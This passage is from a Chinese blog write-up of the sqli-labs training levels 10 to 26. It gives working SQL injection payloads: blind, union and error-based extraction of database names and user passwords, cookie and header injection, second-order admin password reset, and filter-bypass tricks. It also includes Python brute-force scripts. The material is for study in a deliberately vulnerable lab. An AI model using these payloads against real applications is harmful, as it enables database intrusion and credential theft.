class="string">--输出某条记录</span></span><br><span class="line"><span class="string">and if(left((select password from users where username='admin'),%d)='%s', sleep(5), 1) --+</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>通用的爆破脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">time_burp</span><span class="params">(sql, max_len)</span>:</span></span><br><span class="line">	name = <span class="string">''</span></span><br><span class="line">	length = <span class="number">1</span></span><br><span class="line">	<span class="keyword">while</span> length &lt; max_len:</span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> string.printable:</span><br><span class="line"></span><br><span class="line">			r = s.get(url + <span class="string">"?id=1' "</span> + (sql % (length, name+i)))</span><br><span class="line">			<span class="keyword">if</span> r.elapsed.total_seconds() &gt; <span class="number">5</span>:</span><br><span class="line">				name += i</span><br><span class="line">				length += <span class="number">1</span></span><br><span class="line">				<span class="keyword">print</span> <span class="string">"this_name ==&gt; "</span>, name</span><br><span class="line">				<span class="keyword">continue</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<pre><code>* 响应头的字段差异，通过比较发现。成功的响应头和失败的响应头的**Content-Length**字段有区别。

  脚本只需改变if条件，这样爆破的速度比较快。
</code></pre><ul>
<li><h5 id="level10"><a href="#level10" class="headerlink" title="level10"></a>level10</h5><ul>
<li>和level9类似，只是以<strong>“</strong>闭合。同样可以时间延迟盲注！</li>
</ul>
</li>
<li><h5 id="level11"><a href="#level11" class="headerlink" title="level11"></a>level11</h5><ul>
<li><p>一般的登录窗口，输入username和password！</p>
<p>分别测试时发现，两个输入框都存在单引号闭合注入漏洞，我们可以使用任意一个进行注入。</p>
<p>猜测后台sql语句类似下面的</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> username, <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> username=<span class="string">'$username'</span> <span class="keyword">and</span> <span class="keyword">password</span> = <span class="string">'$password'</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>注入方式，有两个输出点，完全可以union查询泄露</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--数据库信息泄露</span></span><br><span class="line">1' union <span class="keyword">select</span> <span class="keyword">database</span>(),<span class="keyword">version</span>()<span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--表信息泄露</span></span><br><span class="line"><span class="number">1</span><span class="string">' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">--列信息泄露</span></span><br><span class="line"><span class="string">1'</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name),<span class="number">2</span> <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name = <span class="string">'users'</span> <span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--某列信息泄露</span></span><br><span class="line"><span class="number">1</span><span class="string">' union select group_concat(username),2 from users #</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">--泄露所有用户、密码</span></span><br><span class="line"><span class="string">1'</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="keyword">group_concat</span>(username), <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">users</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="level12"><a href="#level12" class="headerlink" title="level12"></a>level12</h5><ul>
<li><p>根据<strong>“”</strong>测试得到的报错信息，判断后台查询语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> username, <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> username=（“$username”） <span class="keyword">and</span> <span class="keyword">password</span> = （“$<span class="keyword">password</span>”）</span><br></pre></td></tr></table></figure>
<p>​    所以同上面的类似，只是使用<strong>“)</strong>闭合</p>
</li>
<li><p>注入方式</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--数据库信息泄露</span></span><br><span class="line">1") <span class="keyword">select</span> <span class="keyword">database</span>(),<span class="keyword">version</span>() <span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--类似同上</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="level13"><a href="#level13" class="headerlink" title="level13"></a>level13</h5><ul>
<li><p>注入点类似，闭合方式<strong>‘)</strong>。但是不再显示从数据库获取的数据，只是成功与失败的展示的img不同！</p>
<p>可以根据返回的包里的img链接爆破！</p>
</li>
<li><p>注入方式,由于是多个查询且我们不知道前一个是否成功，or是最好的选择</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--爆破数据库名</span></span><br><span class="line">1') or left(database(),%d)='%s'<span class="comment">#</span></span><br><span class="line"><span class="comment">--等等</span></span><br><span class="line">参考类似</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
<ul>
<li><p>爆破脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">header_burp</span><span class="params">(sql, max_len)</span>:</span></span><br><span class="line">	name = <span class="string">''</span></span><br><span class="line">	length = <span class="number">1</span></span><br><span class="line">	<span class="keyword">while</span> length &lt; max_len:</span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> string.printable:</span><br><span class="line"></span><br><span class="line">			payload = &#123;<span class="string">'uname'</span>:<span class="string">'1'</span>, <span class="string">'passwd'</span>:(sql % (length, name+i))&#125;</span><br><span class="line">			r = s.post(url, data=payload)</span><br><span class="line">			<span class="keyword">if</span> <span class="string">'flag'</span> <span class="keyword">in</span> r.text:</span><br><span class="line">				name += i</span><br><span class="line">				length += <span class="number">1</span></span><br><span class="line">				<span class="keyword">print</span> <span class="string">"this_name ==&gt; "</span>, name</span><br><span class="line">				<span class="keyword">continue</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
<ul>
<li><h5 id="level14"><a href="#level14" class="headerlink" title="level14"></a>level14</h5><ul>
<li>测试发现，<strong>“</strong>闭合，其余特征和13一致，注入思路一样！</li>
</ul>
</li>
<li><h5 id="level15"><a href="#level15" class="headerlink" title="level15"></a>level15</h5><ul>
<li>只是不再显示报错信息，仍然是单引号闭合注入</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> ... <span class="keyword">where</span> username=<span class="string">'$uname'</span> <span class="keyword">and</span> <span class="keyword">password</span>=<span class="string">'$passwd'</span></span><br><span class="line">测试：uname:  <span class="number">1</span><span class="string">' or 2=2 #</span></span><br></pre></td></tr></table></figure>
</li>
<li><h5 id="level16"><a href="#level16" class="headerlink" title="level16"></a>level16</h5><ul>
<li>使用<strong>1”) or 1=1#</strong>测试出注入点</li>
</ul>
</li>
<li><h5 id="level17"><a href="#level17" class="headerlink" title="level17"></a>level17</h5><ul>
<li><p>这是一个重置密码的界面！uname窗口测试发现<strong>1‘ #</strong>出现一个图片，似乎显示发现了hack行为。猜测是对uname输入做了检查。</p>
</li>
<li><p>查看源码，发现对uname做了check</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check_input</span><span class="params">($con1, $value)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">//限制了uname窗口的输入长度15</span></span><br><span class="line">	<span class="keyword">if</span>(!<span class="keyword">empty</span>($value))</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="comment">// truncation (see comments)</span></span><br><span class="line">		$value = substr($value,<span class="number">0</span>,<span class="number">15</span>);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Stripslashes if magic quotes enabled</span></span><br><span class="line">	<span class="comment">//delete '\' from addslashes</span></span><br><span class="line">	<span class="keyword">if</span> (get_magic_quotes_gpc())</span><br><span class="line">	&#123;</span><br><span class="line">		$value = stripslashes($value);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">//区分字符和数字</span></span><br><span class="line">	<span class="comment">// Quote if not a number</span></span><br><span class="line">	<span class="keyword">if</span> (!ctype_digit($value))</span><br><span class="line">	&#123;</span><br><span class="line">        <span class="comment">//函数转义 SQL 语句中使用的字符串中的特殊字符</span></span><br><span class="line">		$value = <span class="string">"'"</span> . mysqli_real_escape_string($con1, $value) . <span class="string">"'"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		$value = intval($value);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> $value;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>注入思路</p>
<ul>
<li><p>从update入手</p>
<p>password处存在单引号闭合注入。采用时间盲注即可</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--database()爆破, 不知道为啥sleep(num)结果是sleep(num*10)</span></span><br><span class="line">1' and if(left(database(),1)='s',sleep(0.5),1)<span class="comment">#</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
</li>
<li><h5 id="level18"><a href="#level18" class="headerlink" title="level18"></a>level18</h5><ul>
<li><p>测试完全没找到注入点。</p>
<p>源码发现check了uname和passwd，check如上</p>
<p>关键的sql查询语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span>  users.username, users.password <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> users.username=$uname <span class="keyword">and</span> users.password=$passwd <span class="keyword">ORDER</span> <span class="keyword">BY</span> users.id <span class="keyword">DESC</span> <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">--新建uagents表，三项 uagent, ip, uname</span></span><br><span class="line"><span class="keyword">INSERT</span> <span class="keyword">INTO</span> <span class="string">`security`</span>.<span class="string">`uagents`</span> (<span class="string">`uagent`</span>, <span class="string">`ip_address`</span>, <span class="string">`username`</span>) <span class="keyword">VALUES</span> (<span class="string">'$uagent'</span>, <span class="string">'$IP'</span>, $uname)</span><br></pre></td></tr></table></figure>
</li>
<li><p>在insert处，uagent可以注入。</p>
<p>当uagent是<strong>1’,1,1)#</strong>时，原sql语句相当于</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">insert</span> <span class="keyword">into</span> <span class="string">`security`</span>.<span class="string">`uagents`</span> (<span class="string">`uagent`</span>,<span class="string">`ip_address`</span>,<span class="string">`username`</span>) <span class="keyword">values</span> (<span class="string">'1'</span>,<span class="number">1</span>,<span class="number">1</span>)<span class="comment">#','$IP',$uname)</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>extractvalue报错泄露</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">EXTRACTVALUE (XML_document, XPath_string)</span><br><span class="line">第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc</span><br><span class="line">第二个参数：XPath_string (Xpath格式的字符串)</span><br><span class="line">concat:返回结果为连接参数产生的字符串。</span><br><span class="line"></span><br><span class="line">一般注入手法，由于我们的字符串不是xpath，而产生报错：</span><br><span class="line">and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1</span><br></pre></td></tr></table></figure>
</li>
<li><p>注入payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--泄露数据库名</span></span><br><span class="line">' and extractvalue(1,concat(0x7e,(<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">0x7e</span>)) <span class="keyword">and</span> <span class="string">'1'</span>=<span class="string">'1</span></span><br><span class="line"><span class="string">--其他类似</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="level19"><a href="#level19" class="headerlink" title="level19"></a>level19</h5><ul>
<li><p>类似于18，这里会展示referer，猜测对它有sql操作。</p>
<p>burpsuite更改referer为<strong>‘ and 1=1’</strong>报错，<strong>‘ and ‘1’=’1</strong>，发现正常执行，猜测sql语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">insert</span> <span class="keyword">into</span> <span class="keyword">values</span> (<span class="string">'$referer'</span>, <span class="string">'ip'</span>, <span class="string">'$uname'</span>)</span><br></pre></td></tr></table></figure>
</li>
<li><p>借鉴level18,同样的手法注入</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--泄露table名</span></span><br><span class="line">' and extractvalue(1,concat(0x7e,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()),<span class="number">0x7e</span>)) <span class="keyword">and</span> <span class="string">'1'</span>=<span class="string">'1</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="level20"><a href="#level20" class="headerlink" title="level20"></a>level20</h5><ul>
<li><p>测试发现不会有错误回显，但是当成功时会显示很多信息</p>
</li>
<li><p>阅读源码，发现当成功登录后会为当前username生成一个cookie，再次登录时，会使用该cookie查询，而不会对cookie做check，因此cookie可以作为一个注入点！</p>
</li>
<li><p>在burpsuite验证</p>
<p><img src="sql注入\16.png" alt=""></p>
<p>​    返回的</p>
<p><img src="sql注入\17.png" alt=""></p>
</li>
</ul>
</li>
<li><h5 id="level21"><a href="#level21" class="headerlink" title="level21"></a>level21</h5><ul>
<li><p>仍然是cookie注入，仍然用20的方法注入，发现报错，似乎是cookie编码的问题</p>
<p><img src="sql注入\18.png" alt=""></p>
<p>查看源码，发现cookie是base64编码的。</p>
</li>
<li><p>注入，按20的方法，union注入，并base64编码即可。</p>
<p>坑，编码是Cookie:uname=’???’的uname值部分。</p>
</li>
</ul>
</li>
<li><h5 id="level22"><a href="#level22" class="headerlink" title="level22"></a>level22</h5><ul>
<li><p>cookie注入，同样base64编码！与21不同在于，<strong>“</strong>闭合。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--泄露数据库信息</span></span><br><span class="line">" union <span class="keyword">select</span> <span class="number">1</span>, <span class="keyword">database</span>(),<span class="keyword">version</span> <span class="comment">#</span></span><br><span class="line"><span class="comment">-- 正常sql语句  base64编码就可以了</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="level23"><a href="#level23" class="headerlink" title="level23"></a>level23</h5><ul>
<li><p>GETS参数id，当使用<strong>‘</strong>闭合时，仍然可以发现存在注入，但是<strong>#*</strong>和<strong>–</strong>注释却不起作用。。。</p>
<p>查看源码发现，上述两个注释都被ban了！</p>
</li>
<li><p>注入方式</p>
<ul>
<li><p>使用报错，<strong>extractvalue</strong>或者<strong>updatexml</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--获取数据库信息 extractvalue</span></span><br><span class="line">1' and extractvalue(1, concat(0x7e, (<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">0x7e</span>))</span><br><span class="line"><span class="comment">--获取数据库 表信息</span></span><br><span class="line"><span class="number">1</span><span class="string">' and updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '</span><span class="number">1</span><span class="string">' = '</span><span class="number">1</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
</li>
<li><h5 id="level24"><a href="#level24" class="headerlink" title="level24"></a>level24</h5><ul>
<li><p>提供了注册、登陆、改密的三个窗口。在正常的登陆窗口，测试了注入点发现没有可能。查看源码发现对输入窗口的特殊字符有过滤。</p>
</li>
<li><p>注入方式</p>
<ul>
<li><h5 id="二次注入思路"><a href="#二次注入思路" class="headerlink" title="二次注入思路"></a>二次注入思路</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1. 黑客通过构造数据的形式，在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理，提交的数据报文请求中可能包含了黑客构造的SQL语句或者命令。</span><br><span class="line"></span><br><span class="line">2. 服务端应用程序会将黑客提交的数据信息进行存储，通常是保存在数据库中，保存的数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响应。</span><br><span class="line"></span><br><span class="line">3. 黑客向服务端发送第二个与第一次不相同的请求数据信息。</span><br><span class="line"></span><br><span class="line">4. 服务端接收到黑客提交的第二个请求信息后，为了处理该请求，服务端会查询数据库中已经存储的数据信息并处理，从而导致黑客在第一次请求中构造的SQL语句或者命令在服务端环境中执行。</span><br><span class="line"></span><br><span class="line">5. 服务端返回执行的处理结果数据信息，黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功。</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<pre><code>* 针对该题目，就是利用新创建的用户名闭合修改密码的sql语句，达到修改admin密码的目的。

  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">新建用户</span><br><span class="line">username: admin&apos; #</span><br><span class="line">password: 111</span><br><span class="line">更新密码</span><br><span class="line">111</span><br><span class="line">222</span><br></pre></td></tr></table></figure>
</code></pre><ul>
<li><h5 id="level25"><a href="#level25" class="headerlink" title="level25"></a>level25</h5><ul>
<li><p>一个单引号闭合，<strong>or</strong>和<strong>and</strong>操作符被禁了。但是<strong>union select</strong>不影响啊。。。</p>
</li>
<li><p>而且这里的过滤实现其实太单纯，正则匹配过滤。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">blacklist</span><span class="params">($id)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	$id= preg_replace(<span class="string">'/or/i'</span>,<span class="string">""</span>, $id);			<span class="comment">//strip out OR (non case sensitive)</span></span><br><span class="line">	$id= preg_replace(<span class="string">'/AND/i'</span>,<span class="string">""</span>, $id);		<span class="comment">//Strip out AND (non case sensitive)</span></span><br><span class="line">	</span><br><span class="line">	<span class="keyword">return</span> $id;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>一般我们以下策略可以绕过，实践证明符号代替在这里可以绕过。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">大小写混淆</span><br><span class="line">Or | oR | And | ...</span><br><span class="line">符号代替</span><br><span class="line">|| &amp;&amp;</span><br><span class="line">注释填充</span><br><span class="line">A<span class="comment">/**/</span>ND  o<span class="comment">/**/</span>r</span><br><span class="line">编码</span><br><span class="line">hex, char, urlencode</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="level26"><a href="#level26" class="headerlink" title="level26"></a>level26</h5><ul>
<li><p>这次仍然是单引号闭合，但在25基础上增加了过滤<strong>space &amp; comments</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">blacklist</span><span class="params">($id)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	$id= preg_replace(<span class="string">'/or/i'</span>,<span class="string">""</span>, $id);			<span class="comment">//strip out OR (non case sensitive)</span></span><br><span class="line">	$id= preg_replace(<span class="string">'/and/i'</span>,<span class="string">""</span>, $id);		<span class="comment">//Strip out AND (non case sensitive)</span></span><br><span class="line">	$id= preg_replace(<span class="string">'/[\/\*]/'</span>,<span class="string">""</span>, $id);		<span class="comment">//strip out /*</span></span><br><span class="line">	$id= preg_replace(<span class="string">'/[--]/'</span>,<span class="string">""</span>, $id);		<span class="comment">//Strip out --</span></span><br><span class="line">	$id= preg_replace(<span class="string">'/[#]/'</span>,<span class="string">""</span>, $id);			<span class="comment">//Strip out #</span></span><br><span class="line">	$id= preg_replace(<span class="string">'/[\s]/'</span>,<span class="string">""</span>, $id);		<span class="comment">//Strip out spaces</span></span><br><span class="line">	$id= preg_replace(<span class="string">'/[\/\\\\]/'</span>,<span class="string">""</span>, $id);		<span class="comment">//Strip out slashes</span></span><br><span class="line">	<span class="keyword">return</span> $id;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>绕过方式，对被过滤的字符进行url编码，如空格,写一个脚本看看哪些可以作为空格编码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
<p>def changeToHex(num):<br>        tmp = hex(i).replace(“0x”, “”)<br>        if len(tmp)&lt;2:<br>            tmp = ‘0’ + tmp<br>        return “%” + tmp</p>
<pre><code>req = requests.session()
for i in xrange(0,256):
    i = changeToHex(i) 
    url = &quot;http://localhost/sqli-labs-php7-master/Less-26/?id=0&apos;&quot;
    url += i
    url += &apos;union&apos; + i + &apos;select&apos; + i + &apos;database(),version(),user()&apos;
    url += i + &apos;||&apos; + i + &quot;&apos;i&apos; = &apos;1&quot;
    ret = req.get(url)
    print ret.content
    if &apos;Password&apos; in ret.content:
        print &quot;good,this can use:&quot; + i
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">注入的payload组合</span><br><span class="line"></span><br><span class="line">```sql</span><br><span class="line">--database()</span><br><span class="line">?id=0&apos;%2aunion%2aselect%2adatabase(),1,1%2a||%2a&apos;1&apos;=&apos;1</span><br></pre></td></tr></table></figure>
</code></pre><ul>
<li><p>基于错误的泄漏</p>
<ul>
<li>updatexml函数不需要空格</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--database</span></span><br><span class="line">?id=0'||updatexml(1,concat('$',(database())),0)||'1'='1</span><br></pre></td></tr></table></figure>
</li>
</ul>
<ul>
<li><p>基于bool盲注</p>
<ul>
<li>由于or and过滤得不彻底，仍然可以组合bool盲注</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--database &amp;&amp; -&gt; %26%26</span></span><br><span class="line">?id=1'%26%26left(database(),1)='s'||'1'='1</span><br></pre></td></tr></table></figure>
</li>
</ul>
<ul>
<li><h5 id="level26a"><a href="#level26a" class="headerlink" title="level26a"></a>level26a</h5><ul>
<li></li>
</ul>
</li>
</ul>
<h4 id="学习资源"><a href="#学习资源" class="headerlink" title="学习资源"></a>学习资源</h4><p>​    <a href="[http://drops.leesec.com/#!/drops/651.MySQL%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7](http://drops.leesec.com/#!/drops/651.MySQL注入技巧">mysql注入技巧</a>)</p>
<p>​    <a href=""></a></p>

        </div>
        <div class="post-tool">
            <a class="btn-thumbs-up" href="javascript:void(0);" data-cid="52" title="95">
                <i class="fa fa-thumbs-up" aria-hidden="true"></i> 打赏
            </a>
        </div>
        
        <div class="post-tags">标签：
            
            <a href="../../../../tags/Web/">Web</a>
            
        </div>
        
    </article>
    
    <p>本文代表个人观点，内容仅供参考。若有不恰当之处，望不吝赐教！</p>
    
    
</div>
<script src="../../../../js/busuanzi.pure.mini.js"></script>

        </div><!-- end #main-->
    </div><!-- end #body -->
    <footer class="footer">
    <div class="footer-inner">
        <p>
            <a href="/about" title="关于本站">关于本站</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <!-- 自定义链接 -->
            <a href="/help" title="help">急救中心</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/app" title="App下载">App下载</a>
        </p>
        <p>
            本站点采用<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议</a>，已建立<a href="/timeline" id="siteBuildingTime"></a>天<br>
            ©2017 基于<a href="http://hexo.io" target="_blank">Hexo</a>搭建
            ，主题&nbsp<a href="https://github.com/tangkunyin/hexo-theme-jsimple" target="_blank">JSimple</a>
            ，作者<a href="https://www.tangkunyin.com" target="_blank">唐先森</a>
            ，Hosted by <a href="https://pages.coding.me" style="font-weight: bold">Coding Pages</a>
        </p>
        

    </div>
</footer>
<script src="../../../../js/InsightSearch.js"></script>
<script src="../../../../js/SimpleCore.js"></script>

</div>
<div class="fixed-btn">
    <a class="btn-gotop" href="javascript:"> <i class="fa fa-angle-up"></i></a>
</div>
<script>
    $(function () {
        SimpleCore.init({
            buildingTime: '11/22/2018',
            current: $('.post-tags').length > 0 ? 'post' : 'archive',
            snsQRCode: '/images/sns-qrcode.png',
            donateImg: '/images/donate-qr.png',
        });
    });
</script>
</body>
</html>
